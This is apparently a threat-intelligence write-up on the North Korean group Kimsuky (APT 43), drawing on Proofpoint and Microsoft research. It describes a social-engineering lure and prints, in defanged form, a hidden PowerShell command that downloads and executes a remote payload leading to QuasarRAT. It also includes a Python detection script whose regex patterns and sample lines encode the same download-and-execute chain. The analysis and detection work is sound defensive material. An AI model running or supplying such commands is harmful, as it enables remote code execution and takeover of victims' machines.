Kimsuky, also known as APT 43, is a North Korean state-affiliated actor that has been operating since 2012. Many North Korean APTs, or subgroups of the Lazarus Group, are focused on financial gain in support of North Korea. These groups have been rather successful at conducting cyber bank heists, such as the one in Bangladesh and the SWIFT banking hacks that resulted in $81,000,000 stolen. It's important to note that those attacks were carried out by the Lazarus Group (APT 38), and some security researchers umbrella all North Korean activity under the Lazarus Group name.

The focus has since shifted: the group now concentrates mostly on foreign policy and national security issues, specifically those relating to nuclear policy, the Korean Peninsula, and sanctions. Initially the group targeted South Korea, but it has since expanded its interests to the governments, manufacturing, and services industries of the UN, the USA, Japan, Russia, and NATO countries.

This group is notoriously effective at social engineering. Its operators often identify targets and engage with them for weeks to establish trust and rapport before extracting intelligence or deploying malware. Kimsuky also assigns multiple people, running multiple identities, to a single target in order to bolster their chances of success.

Recently, Kimsuky has been abusing email security misconfigurations at large companies to spoof identities. This helps their social engineering attempts: they appear legitimate, and more trust is established with the victims. Once enough time has passed and rapport has been established, the attacker sends an official-looking email like this:

Inside this PDF is a malicious link that takes the victim to a site hosting the PDF. If the victim attempts to download the PDF to fill it out, they are met with a pop-up window requiring them to 'register' their device.

The attacker then gives instructions on how to 'verify' the device, which consist of having the user copy and paste malicious commands into PowerShell. An example of the command is here:

powershell -windowstyle hidden -Command iwr "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile "$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex

(The iwr ... -OutFile part downloads the remote file into the user's temp directory; Get-Content reads it back into $c, and iex runs the recently downloaded malicious code. The -windowstyle hidden switch keeps the PowerShell window out of the victim's view.)

If successful, this also drops a decoy PDF with actual questions regarding nuclear non-proliferation, so everything looks normal to the victim. It then downloads another VBScript, temp.vbs, which is scheduled to run every 19 minutes. Eventually these scheduled tasks download and run batch files, which create and decode PowerShell commands that deploy a Remote Administration Tool (RAT) called QuasarRAT. The RAT communicates with command and control (C2) infrastructure, through which the attackers can send commands to infected machines.
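The pasted command above has a recognizable shape (hidden window, web download into the temp directory, then in-memory execution), which is what a detection rule on process command lines should key on. The following is an added example written for this post, not code from the original article or from Proofpoint or Microsoft; the sample command lines are constructed, and the defanged URL is the one quoted above.

```python
import re

# Constructed sample process-creation command lines (Sysmon event 1 / 4688 style).
# Only the third entry reproduces the command from the article (URL defanged as on the page).
SAMPLE_COMMAND_LINES = [
    # Benign admin usage: no download, no in-memory execution
    'powershell -Command Get-Service | Where-Object Status -eq Running',
    # Benign download to a normal location with no execution step
    'powershell -Command iwr https://example.invalid/report.csv -OutFile C:\\Reports\\r.csv',
    # The paste-and-run chain described in the article
    'powershell -windowstyle hidden -Command iwr "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" '
    '-OutFile "$env:TEMP\\p"; $c=Get-Content -Path "$env:TEMP\\p" -Raw; iex',
    # Constructed variant of the same chain using full cmdlet names and the short -w switch
    'PowerShell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.10/a -OutFile $env:TEMP\\x; '
    'Invoke-Expression (Get-Content $env:TEMP\\x -Raw)"',
]

# Each indicator is one stage of the chain; matching is case-insensitive because PowerShell is.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "web_download": re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b", re.I),
    "temp_outfile": re.compile(r"-OutFile\s+\"?\$env:TEMP", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def score_command_line(cmd):
    """Return the set of indicator names that match one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}


def is_paste_and_run_chain(cmd):
    """Flag only when a download and an in-memory execution co-occur in one command.

    A download alone (the benign report fetch) is not enough; it is the download
    followed by iex / Invoke-Expression that distinguishes the chain in the article.
    """
    hits = score_command_line(cmd)
    return "web_download" in hits and "invoke_expression" in hits


def triage(lines):
    """Return (command line, sorted indicator names) for every flagged entry."""
    return [(cmd, sorted(score_command_line(cmd))) for cmd in lines if is_paste_and_run_chain(cmd)]
```

The extra indicators (hidden window, temp-directory output) are reported alongside the hit so an analyst can rank alerts; a command that matches all four stages deserves attention before one that matches only two.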

QuasarRAT can do the following things and more:
activating Remote Desktop, accessing remote webcams, establishing remote shells (control of the device's command line), keylogging (capturing the target's keystrokes), reverse proxying, and data exfiltration.

Note that the majority of this write-up draws on research conducted by Proofpoint and Microsoft; additionally, BleepingComputer is a great source for recent APT activity.
